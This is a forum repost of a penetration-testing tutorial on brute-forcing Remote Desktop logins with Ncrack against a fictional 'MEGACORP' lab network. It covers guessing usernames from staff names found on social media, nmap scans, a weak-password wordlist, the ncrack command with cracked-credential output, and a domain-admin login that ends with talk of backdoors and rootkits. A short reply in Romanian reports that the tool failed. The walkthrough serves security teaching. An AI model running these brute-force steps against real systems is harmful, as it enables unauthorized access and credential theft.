Jump to content
Fi8sVrs

Remote desktop credentials audit with Ncrack

By Fi8sVrs, in Tutoriale in engleza

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted

password.jpg

DISCLAIMER

All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:

jessie tagle

julio feagins

hugh duchene

darmella martis

lakisha mcquain

ted restrepo

kelly missildine

Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.

jtagle

jfeagins

hduchene

dmartis

lmcquain

trestrepo

kmissildine

Software required:

Linux machine, preferably Ubuntu.

nmap and terminal server client, sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev

About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .Ncrack - High-speed network authentication cracker

Installation

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Information gathering

Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan.

Nmap ping scan, go no further than determining if host is online

nmap  -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan with input from list of hosts/networks


nmap -F -iL 192.168.56.0.txt
Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST

Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying

to pwn it.

At this point we need to create a file (my.usr) with the probable usernames previously gathered.

vim my.usr

jtagle

jfeagins

hduchene

trestrepo

kmissildine

We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.

vim my.pwd

somepassword

passw0rd

blahblah

12345678

iloveyou

trustno1

At this point we run Ncrack against the 192.168.56.10 machine.


ncrack -vv  -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.

Run the terminal server client from the Linux box

tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!

rdp1.png

At this point we have the control of the entire MEGACORP domain, unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse over the protected network resources, install backdoors and root-kits, and more and more.

rdp2.png

source: Remote desktop credentials audit with Ncrack ? Eclectic Security

mad93 Newbie

mad93

Posted
Posted

cu cateva zile in urma am folosit ncrak pe un vps la care cunosteam datele am pus doar 3 parole in document printre care si cea buana si nu a reusit sa se conecteze .Daca la voi functioneaza va rog sa postati ca sa stiu daca se merita sa incerc pe o alta distributie

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...